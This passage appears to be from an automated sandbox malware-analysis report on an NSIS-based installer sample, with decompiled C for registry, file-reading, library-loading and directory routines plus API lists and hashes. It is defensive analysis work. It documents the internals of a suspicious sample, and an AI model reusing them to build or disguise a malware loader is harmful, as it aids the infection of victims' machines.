				_t40 =  !=  ? 0 : _a56;
				if(_t40 != 0) {
					_t25 = _a64;
					if(_t25 != 1) {
						_t48 = 4;
						__eflags = _t25 - 1;
						if(_t25 != 1) {
							_t48 = _t33;
							__eflags = _t25 - 3;
							if(_t25 == 3) {
								_t48 = E004030D6(0, _a52, _t33, 0x40a8e8, 0xc00);
							}
						} else {
							 *0x40a8e8 = E00402E56(3);
						}
					} else {
						E00402E92(_t38, 0x23);
						_t48 = lstrlenA(0x40a8e8) + 1;
					}
					_t26 = RegSetValueExA(_t40,  *(_t49 + 0x60), _t33, _a76, 0x40a8e8, _t48); // executed
					_push(_t40);
					asm("sbb eax, eax");
					 *(_t49 + 0x14) =  *(_t49 + 0x14) &  ~_t26;
					RegCloseKey(); // executed
				}
				_t23 =  *((intOrPtr*)(_t49 + 0x10));
				 *0x4240c8 =  *0x4240c8 + _t23;
				return 0;
			}















                                                                                                                                                                                            0x00402653
                                                                                                                                                                                            0x0040265d
                                                                                                                                                                                            0x00402668
                                                                                                                                                                                            0x0040266c
                                                                                                                                                                                            0x00402680
                                                                                                                                                                                            0x0040268a
                                                                                                                                                                                            0x00402697
                                                                                                                                                                                            0x0040269c
                                                                                                                                                                                            0x004026a2
                                                                                                                                                                                            0x004026ad
                                                                                                                                                                                            0x004026c3
                                                                                                                                                                                            0x004026c4
                                                                                                                                                                                            0x004026c6
                                                                                                                                                                                            0x004026d7
                                                                                                                                                                                            0x004026d9
                                                                                                                                                                                            0x004026dc
                                                                                                                                                                                            0x004026ee
                                                                                                                                                                                            0x004026ee
                                                                                                                                                                                            0x004026c8
                                                                                                                                                                                            0x004026d0
                                                                                                                                                                                            0x004026d0
                                                                                                                                                                                            0x004026af
                                                                                                                                                                                            0x004026b1
                                                                                                                                                                                            0x004026bc
                                                                                                                                                                                            0x004026bc
                                                                                                                                                                                            0x004026fc
                                                                                                                                                                                            0x00402704
                                                                                                                                                                                            0x00402705
                                                                                                                                                                                            0x00402707
                                                                                                                                                                                            0x0040270b
                                                                                                                                                                                            0x0040270b
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm8742.tmp,00000023,?,00000011,00000002), ref: 004026B7
                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsm8742.tmp,?,?,00000011,00000002), ref: 004026FC
                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsm8742.tmp,?,?,00000011,00000002), ref: 0040270B
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseValuelstrlen
                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsm8742.tmp
                                                                                                                                                                                            • API String ID: 2655323295-2819239781
                                                                                                                                                                                            • Opcode ID: d738347147ef967f444ebfb61cc62bdff042c520608b6a7b5eaa55bf0a04fe7c
                                                                                                                                                                                            • Instruction ID: e63a3e53304cfaab22334971a496dc2e30b9dafd4a2880fe124e8a5ea1941148
                                                                                                                                                                                            • Opcode Fuzzy Hash: d738347147ef967f444ebfb61cc62bdff042c520608b6a7b5eaa55bf0a04fe7c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0721FF71648308ABD710AF60CE09A2BB7E8FF85314F10483FF645A61C2DBFA8C04965E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004066E5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E004066E5(signed int _a4) {
				struct HINSTANCE__* _t6;
				signed int _t8;

				_t8 = _a4;
				_t9 =  *(0x40a030 + _t8 * 8);
				_t6 = GetModuleHandleA( *(0x40a030 + _t8 * 8));
				if(_t6 != 0) {
					L2:
					return GetProcAddress(_t6,  *(0x40a034 + _t8 * 8));
				}
				_t6 = E0040604A(_t9); // executed
				if(_t6 != 0) {
					goto L2;
				}
				return _t6;
			}





                                                                                                                                                                                            0x004066e7
                                                                                                                                                                                            0x004066eb
                                                                                                                                                                                            0x004066f3
                                                                                                                                                                                            0x004066fb
                                                                                                                                                                                            0x00406707
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040670f
                                                                                                                                                                                            0x004066fe
                                                                                                                                                                                            0x00406705
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406717

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403751,0000000C), ref: 004066F3
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040670F
                                                                                                                                                                                              • Part of subcall function 0040604A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406061
                                                                                                                                                                                              • Part of subcall function 0040604A: wsprintfA.USER32 ref: 00406099
                                                                                                                                                                                              • Part of subcall function 0040604A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060AD
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                            • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                                                                                                                                            • API String ID: 2547128583-890815371
                                                                                                                                                                                            • Opcode ID: 474d5a08c42df23931da975fa07a75a813ac460069a08d19125ba75fb7d4e5e6
                                                                                                                                                                                            • Instruction ID: 6e1a27cc72a122c38d9db0034cf56c6006ae3d247d0daf93a7153d707302efc2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 474d5a08c42df23931da975fa07a75a813ac460069a08d19125ba75fb7d4e5e6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 68D02B72101115D7D7001F62AE0885F771DEFA53547024037F941F3231E738D42185BD
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004030D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                            			E004030D6(void* __ecx, char _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				long _v8;
				long _t18;
				void* _t20;
				intOrPtr _t23;
				int _t25;
				void* _t28;
				void* _t29;
				long _t30;
				long _t32;
				char _t38;
				intOrPtr _t39;
				long _t47;

				_push(__ecx);
				_t38 = _a4;
				if(_t38 >= 0) {
					_t32 =  *0x424058 + _t38;
					 *0x40b52c = _t32; // executed
					SetFilePointer( *0x40a014, _t32, 0, 0); // executed
				}
				_t18 = E00402F57(4);
				if(_t18 >= 0) {
					_t20 = E00406747(_t38,  *0x40a014,  &_a4, 4); // executed
					if(_t20 == 0) {
						L16:
						_push(0xfffffffd);
						goto L17;
					} else {
						 *0x40b52c =  *0x40b52c + 4;
						_t47 = E00402F57(_a4);
						if(_t47 < 0) {
							L15:
							_t18 = _t47;
						} else {
							if(_a12 != 0) {
								_t23 = _a16;
								_t24 =  <  ? _a4 : _t23;
								_t25 = ReadFile( *0x40a014, _a12,  <  ? _a4 : _t23,  &_v8, 0); // executed
								if(_t25 == 0) {
									goto L16;
								} else {
									_t47 = _v8;
									 *0x40b52c =  *0x40b52c + _t47;
									goto L15;
								}
							} else {
								_t39 = _a4;
								if(_t39 <= 0) {
									goto L15;
								} else {
									while(1) {
										_t27 =  <  ? _t39 : 0x4000;
										_v8 =  <  ? _t39 : 0x4000;
										_t28 = E00406747(_t39,  *0x40a014, 0x4135d0, _t27); // executed
										if(_t28 == 0) {
											goto L16;
										}
										_t29 = E00406806(_t39, _a8, 0x4135d0, _v8); // executed
										if(_t29 == 0) {
											_push(0xfffffffe);
											L17:
											_pop(_t18);
										} else {
											_t30 = _v8;
											_t47 = _t47 + _t30;
											 *0x40b52c =  *0x40b52c + _t30;
											_t39 = _a4 - _t30;
											_a4 = _t39;
											if(_t39 > 0) {
												continue;
											} else {
												goto L15;
											}
										}
										goto L18;
									}
									goto L16;
								}
							}
						}
					}
					L18:
				}
				return _t18;
			}















                                                                                                                                                                                            0x004030d9
                                                                                                                                                                                            0x004030da
                                                                                                                                                                                            0x004030e2
                                                                                                                                                                                            0x004030ea
                                                                                                                                                                                            0x004030f4
                                                                                                                                                                                            0x004030f9
                                                                                                                                                                                            0x004030f9
                                                                                                                                                                                            0x00403101
                                                                                                                                                                                            0x00403108
                                                                                                                                                                                            0x0040311c
                                                                                                                                                                                            0x00403123
                                                                                                                                                                                            0x004031d0
                                                                                                                                                                                            0x004031d0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403129
                                                                                                                                                                                            0x0040312c
                                                                                                                                                                                            0x00403138
                                                                                                                                                                                            0x0040313c
                                                                                                                                                                                            0x004031cc
                                                                                                                                                                                            0x004031cc
                                                                                                                                                                                            0x00403142
                                                                                                                                                                                            0x00403145
                                                                                                                                                                                            0x004031a5
                                                                                                                                                                                            0x004031ab
                                                                                                                                                                                            0x004031b9
                                                                                                                                                                                            0x004031c1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004031c3
                                                                                                                                                                                            0x004031c3
                                                                                                                                                                                            0x004031c6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004031c6
                                                                                                                                                                                            0x00403147
                                                                                                                                                                                            0x00403147
                                                                                                                                                                                            0x0040314c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040314e
                                                                                                                                                                                            0x00403158
                                                                                                                                                                                            0x0040315c
                                                                                                                                                                                            0x00403167
                                                                                                                                                                                            0x0040316a
                                                                                                                                                                                            0x00403171
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040317a
                                                                                                                                                                                            0x00403181
                                                                                                                                                                                            0x0040319c
                                                                                                                                                                                            0x004031d2
                                                                                                                                                                                            0x004031d2
                                                                                                                                                                                            0x00403183
                                                                                                                                                                                            0x00403183
                                                                                                                                                                                            0x00403186
                                                                                                                                                                                            0x0040318b
                                                                                                                                                                                            0x00403191
                                                                                                                                                                                            0x00403193
                                                                                                                                                                                            0x00403198
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040319a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040319a
                                                                                                                                                                                            0x00403198
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403181
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403158
                                                                                                                                                                                            0x0040314c
                                                                                                                                                                                            0x00403145
                                                                                                                                                                                            0x0040313c
                                                                                                                                                                                            0x004031d3
                                                                                                                                                                                            0x004031d4
                                                                                                                                                                                            0x004031d7

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,C:\Users\user\Desktop,?,00000000,00403504,000000FF,00000000,00000000,?,?), ref: 004030F9
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                                                                                                            • API String ID: 973152223-3370423016
                                                                                                                                                                                            • Opcode ID: 2ddb34ffe9d7a9d2b88af8d3a82cc1839f34ddf87975c44b3e1ed605c36ecf99
                                                                                                                                                                                            • Instruction ID: 3c64f05f942925d647f1111287dba826eaf717984bf2b819343147435068b8ec
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ddb34ffe9d7a9d2b88af8d3a82cc1839f34ddf87975c44b3e1ed605c36ecf99
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C31AF71600205BBDF109F69DE04AAA3AA9EB49755B00413AFE05EA2E1D734DE10DBAD
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406421 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                            			E00406421(void* __eflags, intOrPtr _a4) {
				int _t9;
				signed char* _t10;
				long _t13;
				intOrPtr _t16;
				intOrPtr* _t18;
				void* _t19;

				E0040690A(0x421a58, _a4);
				_t18 = E004069B5(0x421a58);
				if(_t18 == 0) {
					L11:
					return 0;
				}
				E00406AED(_t18);
				if(( *0x42400c & 0x00000080) == 0) {
					L4:
					_t19 = _t18 - 0x421a58;
					while(1) {
						_t9 = lstrlenA(0x421a58);
						_push(0x421a58);
						if(_t9 <= _t19) {
							break;
						}
						_t10 = E004063BD();
						if(_t10 == 0 || ( *_t10 & 0x00000010) != 0) {
							E00406AC2(0x421a58);
							continue;
						} else {
							goto L11;
						}
					}
					E00406346();
					_t13 = GetFileAttributesA(??); // executed
					if(_t13 == 0xffffffff) {
						goto L11;
					}
					return 1;
				}
				_t16 =  *_t18;
				if(_t16 == 0 || _t16 == 0x5c) {
					goto L11;
				} else {
					goto L4;
				}
			}









                                                                                                                                                                                            0x0040642d
                                                                                                                                                                                            0x00406438
                                                                                                                                                                                            0x0040643c
                                                                                                                                                                                            0x00406491
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406491
                                                                                                                                                                                            0x0040643f
                                                                                                                                                                                            0x0040644b
                                                                                                                                                                                            0x00406457
                                                                                                                                                                                            0x00406457
                                                                                                                                                                                            0x0040646f
                                                                                                                                                                                            0x00406470
                                                                                                                                                                                            0x00406476
                                                                                                                                                                                            0x00406479
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040645b
                                                                                                                                                                                            0x00406462
                                                                                                                                                                                            0x0040646a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406462
                                                                                                                                                                                            0x0040647b
                                                                                                                                                                                            0x00406481
                                                                                                                                                                                            0x0040648a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040648e
                                                                                                                                                                                            0x0040644d
                                                                                                                                                                                            0x00406451
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0040690A: lstrcpynA.KERNEL32(?,?,00000400,004037B2,Apteres Setup,NSIS Error), ref: 00406917
                                                                                                                                                                                              • Part of subcall function 004069B5: CharNextA.USER32(?,?,?,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,00406438,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,00000000,?,?,0040651F,?,00000000,756D3410,?), ref: 004069C3
                                                                                                                                                                                              • Part of subcall function 004069B5: CharNextA.USER32(00000000), ref: 004069C8
                                                                                                                                                                                              • Part of subcall function 004069B5: CharNextA.USER32(00000000), ref: 004069DC
                                                                                                                                                                                              • Part of subcall function 00406AED: CharNextA.USER32(?,*?|<>/":,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B54
                                                                                                                                                                                              • Part of subcall function 00406AED: CharNextA.USER32(?,?,?,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B61
                                                                                                                                                                                              • Part of subcall function 00406AED: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B66
                                                                                                                                                                                              • Part of subcall function 00406AED: CharPrevA.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B7D
                                                                                                                                                                                            • lstrlenA.KERNEL32(miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,00000000,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,00000000,?,?,0040651F,?,00000000,756D3410,?), ref: 00406470
                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til), ref: 00406481
                                                                                                                                                                                              • Part of subcall function 004063BD: FindFirstFileA.KERNELBASE(00000000,00422A58,00000000,00406460,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til), ref: 004063C8
                                                                                                                                                                                              • Part of subcall function 004063BD: FindClose.KERNEL32(00000000), ref: 004063D4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                                                                                                                                                                            • String ID: miscalculates\glemmeprocesserne\overfatigues\skuddagens.til
                                                                                                                                                                                            • API String ID: 1879705256-4139271342
                                                                                                                                                                                            • Opcode ID: 45e2cc292fc3a4dce2b3d178250e5afd54de8fc5069d436611693c5c754d8f29
                                                                                                                                                                                            • Instruction ID: 226e6ac13f27f006c92b1f98fcb46bc65f6d9cb6a70812fec007da550759388d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 45e2cc292fc3a4dce2b3d178250e5afd54de8fc5069d436611693c5c754d8f29
                                                                                                                                                                                            • Instruction Fuzzy Hash: 90F0C86154436125C621BE750D8965B164C4F0335C707953BBDD7B22E3CB3CC83695BD
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406776 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45registryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                            			E00406776(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, char* _a16, int _a20) {
				void* _v8;
				int _v12;
				long _t20;
				long _t23;
				char* _t26;

				_v12 = 0x400;
				asm("sbb eax, eax");
				_t20 = E0040614A(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_v8); // executed
				_t26 = _a16;
				if(_t20 != 0) {
					L4:
					 *_t26 = 0;
				} else {
					_t23 = RegQueryValueExA(_v8, _a12, 0,  &_a20, _t26,  &_v12); // executed
					_t20 = RegCloseKey(_v8); // executed
					_t26[0x3ff] = 0;
					if(_t23 != 0 || _a20 != 1 && _a20 != 2) {
						goto L4;
					}
				}
				return _t20;
			}








                                                                                                                                                                                            0x0040677f
                                                                                                                                                                                            0x0040678c
                                                                                                                                                                                            0x0040679f
                                                                                                                                                                                            0x004067a4
                                                                                                                                                                                            0x004067a9
                                                                                                                                                                                            0x004067e6
                                                                                                                                                                                            0x004067e6
                                                                                                                                                                                            0x004067ab
                                                                                                                                                                                            0x004067bd
                                                                                                                                                                                            0x004067c8
                                                                                                                                                                                            0x004067d0
                                                                                                                                                                                            0x004067d8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004067d8
                                                                                                                                                                                            0x004067eb

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(000203D0,00000000,00000000,?,?,00000400,?,00000400,?,?,000203D0,Call,?,?,00000002,00405E5C), ref: 004067BD
                                                                                                                                                                                            • RegCloseKey.KERNELBASE(000203D0), ref: 004067C8
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                                            • String ID: Call
                                                                                                                                                                                            • API String ID: 3356406503-1824292864
                                                                                                                                                                                            • Opcode ID: d4a53da3d22aebc016d6eec0589827d8e20a423a04cf6fb0ed85d5a3a6173058
                                                                                                                                                                                            • Instruction ID: 8873edaea0c7c76b80d912b42fb631c5930a44452e290465650ceb2af23291be
                                                                                                                                                                                            • Opcode Fuzzy Hash: d4a53da3d22aebc016d6eec0589827d8e20a423a04cf6fb0ed85d5a3a6173058
                                                                                                                                                                                            • Instruction Fuzzy Hash: 83015A76500109EFDF218F64DD06FEA7BA8EF19348F11012AF902A2250D378DA64DBA8
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00405CCC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00405CCC(CHAR* _a4) {
				int _t2;
				long _t5;

				_t5 = 0;
				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					_t5 = GetLastError();
				}
				return _t5;
			}





                                                                                                                                                                                            0x00405ccd
                                                                                                                                                                                            0x00405cd4
                                                                                                                                                                                            0x00405cdc
                                                                                                                                                                                            0x00405ce4
                                                                                                                                                                                            0x00405ce4
                                                                                                                                                                                            0x00405ce9

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403BFB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00405CD4
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405CDE
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CCC
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                            • API String ID: 1375471231-3355392842
                                                                                                                                                                                            • Opcode ID: b7deee19aa505c7f9bc01a03303daab882d22c4ac73502a2d2277e442c3833e4
